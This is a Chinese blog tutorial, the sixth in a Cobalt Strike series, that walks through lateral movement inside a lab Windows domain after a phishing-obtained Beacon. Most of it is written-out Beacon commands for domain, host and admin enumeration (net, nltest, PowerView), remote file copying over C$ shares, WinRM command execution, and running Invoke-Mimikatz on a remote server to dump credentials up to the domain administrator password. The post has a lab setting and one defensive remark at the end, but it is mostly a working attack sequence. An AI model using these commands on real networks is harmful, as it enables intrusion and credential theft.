CobaltStrike使用-第六篇(域内渗透横向扩展)

2024-01-10 21:10

本文主要是介绍CobaltStrike使用-第六篇(域内渗透横向扩展),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

在这里插入图片描述

本篇为CS使用系列第六篇文章,主要以一个案例来演示使用CS进行横向移动

文章目录

  • 域内渗透&横向扩展
    • 网络拓扑
    • 环境搭建
    • 1.主机枚举
      • Windows 的内置命令
      • PowerView
      • CS net模块
    • 2.用户枚举
      • 1.判断当前账号是否为管理员账号
      • 2.判断哪些账号是域管理员账号
      • 3.判断本地管理员
    • 3.利用
      • 文件操作
      • 使用WinRM运行命令
      • Powersploit运行mimikatz

域内渗透&横向扩展

网络拓扑

image-20211204103027107

从网络拓扑结构中分析得出

  • 客户机win7具有双网卡,与攻击者在同一网段(192)可以直接访问,在现实中就是公网IP
  • 客户机win7、成员服务器:Win Server2008-2、域控制器:Win Server2008-1在同一内网(10段),也在同一个域内,可以相互访问

用一个网络拓扑图来展示,可能不是很准确

image-20211204104630734

在一个用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)

这三个区域负责完成不同的任务,因此需要设置不同的访问策略

DMZ 称为隔离区,是为了解决安装防火墙后外部网络不能访问内部网络服务器的问题而设立的一个非安全系统与安全系统之间的缓冲区。DMZ 位于企业内部网络和外部网络之间。可以在DMZ 中放置一些必须公开的服务器设施,例如企业Web 服务器、FTP 服务器和论坛服务器等。DMZ 是对外提供服务的区域,因此可以从外部访问。在网络边界上一般会部署防火墙及入侵检测、入侵防御产品等。如果有Web 应用,还会设置WAF,从而更加有效地保护内网。攻击者如果要进入内网,首先要突破的就是这重重防御。在配置一个拥有DMZ 的网络时,通常需要定义如下访问控制策略,以实现其屏障功能

  • 内网可以访问外网:内网用户需要自由地访问外网。在这一策略中,防火墙需要执行NAT
  • 内网可以访问DMZ:此策略使内网用户可以使用或者管理DMZ 中的服务器
  • 外网不能访问内网:这是防火墙的基本策略。内网中存储的是公司内部数据,显然,这些数据一般是不允许外网用户访问的(如果要访问,就要通过VPN 的方式来进行)
  • 外网可以访问DMZ:因为DMZ 中的服务器需要为外界提供服务,所以外网必须可以访问DMZ。同时,需要由防火墙来完成从对外地址到服务器实际地址的转换
  • DMZ 不能访问内网:如果不执行此策略,当攻击者攻陷DMZ 时,内网将无法受到保护
  • DMZ 不能访问外网:此策略也有例外。例如,在DMZ 中放置了邮件服务器,就要允许访问外网,否则邮件服务器无法正常工作

内网又可以分为办公区和核心区

办公区:公司员工日常的工作区,一般会安装防病毒软件、主机入侵检测产品等。办公区一般能够访问DMZ。如果运维人员也在办公区,那么部分主机也能访问核心数据区(很多大企业还会使用堡垒机来统一管理用户的登录行为)。攻击者如果想进入内网,一般会使用鱼叉攻击、水坑攻击,当然还有社会工程学手段。办公区人员多而杂,变动也很频繁,在安全管理上可能存在诸多漏洞,是攻击者进入内网的重要途径之一

核心区:存储企业最重要的数据、文档等信息资产,通过日志记录、安全审计等安全措施进行严密的保护,往往只有很少的主机能够访问。从外部是绝难直接访问核心区的。一般来说,能够直接访问核心区的只有运维人员或者IT 部门的主管,所以,攻击者会重点关注这些用户的信息(攻击者在内网中进行横向移动攻击时,会优先查找这些主机)

参考:内网安全攻防:渗透测试实战指南

在开始域内渗透之前,先说明下现在的情况,我们已经通过钓鱼攻击拿到了Victim的Beacon,并且为了尽可能不被内网态势感知防火墙发现,派生SMB Beacon,SMB Beacon 就是为了内网横向扩展渗透而设计的

image-20211204110236750

image-20211204110732311

环境搭建

关于如何搭建域环境在完整的域渗透实验中已经介绍的很清楚了,这次这需要添加一个域内用户即可

配置客户机win7IP地址

虚拟机win7安装双网络适配器,第二个设置为Lan区段10.0.0.1

image-20211204101006465

配置网卡2的IP地址和DNS服务器

image-20211204100938556

加入域

首先在域控主机上添加用户

image-20211204101817861

image-20211204101950474

win7加入域

image-20211204102125397

设置成功后重启虚拟机,重启后使用域账号登录

设置winserver2008-2

真实企业中,因为普通域用户在做一些高级别操作的时候,需要域管理员的账号和密码,有时候用户为了方便就会把普通的域用户增加到目标主机的超级管理员组,所以这里直接把win701用户添加至server2008-2的管理员组

image-20211205170423779

自动添加的方法:Windows 2008 R2 AD系列一:域用户自动加入本地管理员

Windows Server 2012 AD DS环境下域用户自动加入本地管理员组

Server2008-2开启winRM

winrm service 默认都是未启用的状态,先查看状态;如无返回信息,则是没有启动;

winrm enumerate winrm/config/listener

针对winrm service 进行基础配置:

winrm quickconfig

image-20211205183904443

1.主机枚举

当进入目标局域网时,需要弄清楚几个问题

1、我正处在那个域上?

2、域信任关系是什么样的?

3、可以登陆哪些域?这些域上有哪些系统?目标是什么?可以获取什么?

4、系统上存放共享数据的地方在哪里?

Windows 的内置命令

只有收集足够的信息,才能更好的进行下一步操作,在Beacon中可以通过在命令前边加shell的方式执行windows shell命令

shell whoami

image-20211204111316210

shell net user

image-20211204111428691

发现是一个域内普通用户,接下来进行用户枚举

  • 枚举出当前域

    shell net view /domain
    

    image-20211204113550627

    如果出现"此工作组的服务器列表当前无法使用",说明Victim没有关闭防火墙

    image-20211204112112432

  • 枚举域上的主机列表(但不是所有主机,这个也就是在网上邻居中可以看到的内容)

    # shell net view /domain:[domain]
    shell net view /domain:OCEAN0
    

    image-20211204113807982

    net group可以获得加入到这个域中的电脑账户列表

    shell net group "domain computers" /domain
    

    image-20211204113911897

  • 获取目标主机IP

    shell ping NetBIOSName
    

    image-20211204114146596

    通过nslookup命令

    shell nslookup NetBIOSName
    

    image-20211204114918512

  • 查看域控

    shell nltest /dclist:[domain]# 当使用 32 位的 payload 运行在 64 位的系统上,并且 nltest 路径不对的时候,可能会提示没有 nltest 这个命令,这时可以尝试使用下面的命令为其指定路径
    shell C:\windows\sysnative\nltest /dclist:[domain]
    

    image-20211205132806284

  • 查看信任关系

    shell nltest /domain_trusts
    

    image-20211205132745796

  • 列出主机共享列表

    shell net view \\[name]# name可以用获取域内注解列表命令得到
    shell net view /domain:OCEAN0
    

    image-20211205133041665

PowerView

在渗透进入内网后,如果直接使用 Windows 的内置命令,比如 net view、net user等,可能就会被管理人员或者各种安全监控设备所发现。因此较为安全的办法就是使用 Powershell 和 VMI 来进行躲避态势感知的检测

PowerView 是由 Will Schroeder 开发的 PowerShell 脚本,该脚本完全依赖于 Powershell 和 VMI ,使用 PowerView 可以更好的收集内网中的信息,在使用之前,与 PowerUp 的一样需要先 import 导入 ps1 文件

PowerView 下载地址:https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

使用命令导入脚本

powershell-import

导入文件后就可以执行命令(需要在前边加上powershell)

  • 查询本地域的信息

    powershell Get-NetDomain
    

    image-20211205135540293

  • 查看是否存在网络共享

    powershell Invoke-ShareFinder
    

    image-20211205135652380

  • 查看域信任关系

    powershell Invoke-MapDomainTrust
    

    没有有用的信息

CS net模块

Cobalt Strike 中有自己的 net 模块,net 模块是 beacon 后渗透攻击模块,它通过 windows 的网络管理 api 函数来执行命令,想使用 net 命令,只需要在 beacon 的控制中心输入 net + 要执行的命令即可

net dclist : 列出当前域的域控制器
net dclist [DOMAIN] : 列出指定域的域控制器
net share \\[name] : 列出目标的共享列表
net view : 列出当前域的主机
net view [DOMAIN] : 列出指定域的主机

在 beacon 控制台中输入这些命令很类似输入一个本地的 net 命令,但相比于主机上运行 Beacon 中输出的结果更加丰富

image-20211205140406148

2.用户枚举

用户枚举的三个关键步骤:

1、当前账号是否为管理员账号?

2、哪些账号是域管理员账号?

3、哪个账号是这个系统上的本地管理员账号?

1.判断当前账号是否为管理员账号

因为普通域用户在做一些高级别操作的时候,需要域管理员的账号和密码,有时候用户为了方便就会把普通的域用户增加到目标主机的超级管理员组,所以为了快速拿到权限可以先判断当前账号是否为管理员账号

可以尝试运行一些只有管理员账号才有权限操作的命令,然后通过返回结果判断是否为管理员,其中一种方式是尝试列出仅仅只有管理员才能查看的共享列表,比如下面的 dir \\host\C$ 命令,如果可以看到一个文件列表,那么说明可能拥有本地管理员权限

shell dir \\host\C$

通过之前shell命令,已经知道WIN-A9PLNLID2QM为域控主机,那么这就是host

shell dir \\WIN-A9PLNLID2QM\C$

发现账户权限不够拒绝访问,所以现在的权限不是域管理员

image-20211205141748245

尝试访问本地目录,发现可以列出目录,判断当前权限为本地管理员

shell dir \\win701\C$

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZMo1U2ab-1638702777912)(https://gitee.com/q_one/oceanpic/raw/master/img20212/202112051912171.png)]

使用同样方法查看其他主机

shell dir \\SERVER20082\C$

发现该域账号同时使server20082的本地管理员,也就是说可以利用server20082作为跳板机

image-20211205170751674

也可以运行其他命令,比如运行下面的 at 命令来查看系统上的计划任务列表,如果显示出了任务列表信息,那么可能是本地管理员。(当任务列表没有信息时会返回 “列表是空的” 提示)

shell at \\host

powerview

在加载 PowerView 后可以用powerview中的方法

powershell Find-LocalAdminAccess

2.判断哪些账号是域管理员账号

win命令

可以在共享里使用本地的Windows命令,找出这些“域群组”的成员

shell net group "enterprise admins" /DOMAIN
shell net group "domain admins" /DOMAIN

运行下面的命令来看谁是域控制器上的管理员

shell net localgroup "administrators" /domain

image-20211205151151997

Net 模块

下面的命令中 TARGET 的意思是一个域控制器或者是任何想查看的组名,比如企业管理员、域管理员等等

net group \\TARGET group name

也可以运行下面的命令,这会连接任意目标来获取列表

net localgroup \\TARGET group name

powerview

powershell Get-NetLocalGroup -HostName Target

3.判断本地管理员

本地管理员可能是一个域账户,因此如果想把一个系统作为目标,应该找到谁是这个系统的本地管理员,因为如果获得了它的密码哈希值或者凭据就可以伪装成那个用户

Net模块

beacon 的 net 模块可以在系统上从一个没有特权的关联中查询本地组和用户

在 beacon 控制台中运行下面命令可以获得一个目标上的群组列表

net localgroup \\TARGET

如果想获取群组的列表,可运行下面的命令来获得一个群组成员的名单列表。

net localgroup \\TARGET group name

PowerView 模块

PowerView 使用下面的命令能够在一个主机上找到本地管理员,这条命令实际上通过管理员群组找到同样的群组并且把成员名单返回出来

Get-Netlocalgroup -hostname TARGET

3.利用

如果一个系统信任我们为本地管理员权限,无需恶意软件就可以进行以下操作(适用于域用户为其他域成员服务器的本地管理员的情况)

文件操作

  • 查看共享文件

    shell dir \\host\C$\foo
    
  • 复制文件

    shell copy \\host\C$\foo\secrets.txt
    
  • 查看文件列表

    shell dir /S /B \\host\C$
    # 其中 /S 表示列出指定目录及子目录所有文件,/B 表示使用空格式,即没有标题或摘要信息
    

使用WinRM运行命令

WinRM 运行在 5985 端口上,WinRM 是 Windows 远程管理服务,使用 WinRM 可以使远程管理更容易一些

如果想利用 WinRM 运行命令则可以使用下面的命令

powershell Invoke-Command -ComputerName TARGET -ScriptBlock {command here}# powershell Invoke-Command -ComputerName SERVER20082 -ScriptBlock {net localgroup administrators}

image-20211205184000337

注:如果命令运行失败可能是因为 WinRM 配置原因,可在 powershell 环境下运行 winrm quickconfig命令,输入 y 回车即可

命令运行后的结果,WinRM 也将通过命令行进行显示,因此可以使用 Powershell 的 Invoke 命令来作为远程工具,而不使用其他的恶意软件来控制系统

Powersploit运行mimikatz

使用 PowerSploit 来通过 WinRM 运行 Mimikatz,只需要先导入 Invoke-Mimikatz.ps1 文件,再执行以下命令即可

powershell-import /path/to/Invoke-Mimikatz.ps1
powershell Invoke-Mimikatz -ComputerName TARGET

注:之前提了很多次的 PowerView 也是 PowerSploit 项目里众多 ps1 文件之一,Mimikatz 的 ps1 文件在 PowerSploit 项目的 Exfiltration 目录下

因为 beacon 上传文件大小限制在1MB,而 Invoke-Mimikatz.ps1 文件大小在 2 MB 多(有600K的版本),因此直接运行 powershell-import 导入该文件会报错,这里可以选择使用 beacon 中的 upload 命令或者在当前会话的 File Browser 图形界面中上传该文件

upload C:\path\Invoke-Mimikatz.ps1

上传之后通过 dir 命令可以查看到文件被上传到了C盘下,之后可以运行以下命令来导入该文件

powershell import-module C:\Invoke-Mimikatz.ps1

最后再运行以下命令就能通过 WinRM 执行 Mimikatz 了

powershell Invoke-Mimikatz -ComputerName TARGET

如果提示:无法将“Invoke-Mimikatz”项识别为 cmdlet、函数……,则可以将两条命令以分号合并在一起运行,即:

# beacon> powershell import-module C:\Invoke-Mimikatz.ps1 ; Invoke-Mimikatz -ComputerName SERVER20082
beacon> powershell import-module C:\Users\win701\Desktop\Invoke-Mimikatz.ps1 ; Invoke-Mimikatz -ComputerName TARGET

image-20211205184229908

这样的话就拿到了Server2008-2的账密,以及域控超级管理员账号和密码,如果域控开启了3389就可以直接远程连接

image-20211205185443240

实验中导致横向移动原因是因为存在域普通用户作为本地超级管理员的情况,企业应避免使用这种不安全的权限分配
在这里插入图片描述

这篇关于CobaltStrike使用-第六篇(域内渗透横向扩展)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/592079

相关文章

如何使用celery进行异步处理和定时任务(django)

《如何使用celery进行异步处理和定时任务(django)》文章介绍了Celery的基本概念、安装方法、如何使用Celery进行异步任务处理以及如何设置定时任务,通过Celery,可以在Web应用中... 目录一、celery的作用二、安装celery三、使用celery 异步执行任务四、使用celery

使用Python绘制蛇年春节祝福艺术图

《使用Python绘制蛇年春节祝福艺术图》:本文主要介绍如何使用Python的Matplotlib库绘制一幅富有创意的“蛇年有福”艺术图,这幅图结合了数字,蛇形,花朵等装饰,需要的可以参考下... 目录1. 绘图的基本概念2. 准备工作3. 实现代码解析3.1 设置绘图画布3.2 绘制数字“2025”3.3

Jsoncpp的安装与使用方式

《Jsoncpp的安装与使用方式》JsonCpp是一个用于解析和生成JSON数据的C++库,它支持解析JSON文件或字符串到C++对象,以及将C++对象序列化回JSON格式,安装JsonCpp可以通过... 目录安装jsoncppJsoncpp的使用Value类构造函数检测保存的数据类型提取数据对json数

python使用watchdog实现文件资源监控

《python使用watchdog实现文件资源监控》watchdog支持跨平台文件资源监控,可以检测指定文件夹下文件及文件夹变动,下面我们来看看Python如何使用watchdog实现文件资源监控吧... python文件监控库watchdogs简介随着Python在各种应用领域中的广泛使用,其生态环境也

Python中构建终端应用界面利器Blessed模块的使用

《Python中构建终端应用界面利器Blessed模块的使用》Blessed库作为一个轻量级且功能强大的解决方案,开始在开发者中赢得口碑,今天,我们就一起来探索一下它是如何让终端UI开发变得轻松而高... 目录一、安装与配置:简单、快速、无障碍二、基本功能:从彩色文本到动态交互1. 显示基本内容2. 创建链

springboot整合 xxl-job及使用步骤

《springboot整合xxl-job及使用步骤》XXL-JOB是一个分布式任务调度平台,用于解决分布式系统中的任务调度和管理问题,文章详细介绍了XXL-JOB的架构,包括调度中心、执行器和Web... 目录一、xxl-job是什么二、使用步骤1. 下载并运行管理端代码2. 访问管理页面,确认是否启动成功

使用Nginx来共享文件的详细教程

《使用Nginx来共享文件的详细教程》有时我们想共享电脑上的某些文件,一个比较方便的做法是,开一个HTTP服务,指向文件所在的目录,这次我们用nginx来实现这个需求,本文将通过代码示例一步步教你使用... 在本教程中,我们将向您展示如何使用开源 Web 服务器 Nginx 设置文件共享服务器步骤 0 —

Java中switch-case结构的使用方法举例详解

《Java中switch-case结构的使用方法举例详解》:本文主要介绍Java中switch-case结构使用的相关资料,switch-case结构是Java中处理多个分支条件的一种有效方式,它... 目录前言一、switch-case结构的基本语法二、使用示例三、注意事项四、总结前言对于Java初学者

Golang使用minio替代文件系统的实战教程

《Golang使用minio替代文件系统的实战教程》本文讨论项目开发中直接文件系统的限制或不足,接着介绍Minio对象存储的优势,同时给出Golang的实际示例代码,包括初始化客户端、读取minio对... 目录文件系统 vs Minio文件系统不足:对象存储:miniogolang连接Minio配置Min

使用Python绘制可爱的招财猫

《使用Python绘制可爱的招财猫》招财猫,也被称为“幸运猫”,是一种象征财富和好运的吉祥物,经常出现在亚洲文化的商店、餐厅和家庭中,今天,我将带你用Python和matplotlib库从零开始绘制一... 目录1. 为什么选择用 python 绘制?2. 绘图的基本概念3. 实现代码解析3.1 设置绘图画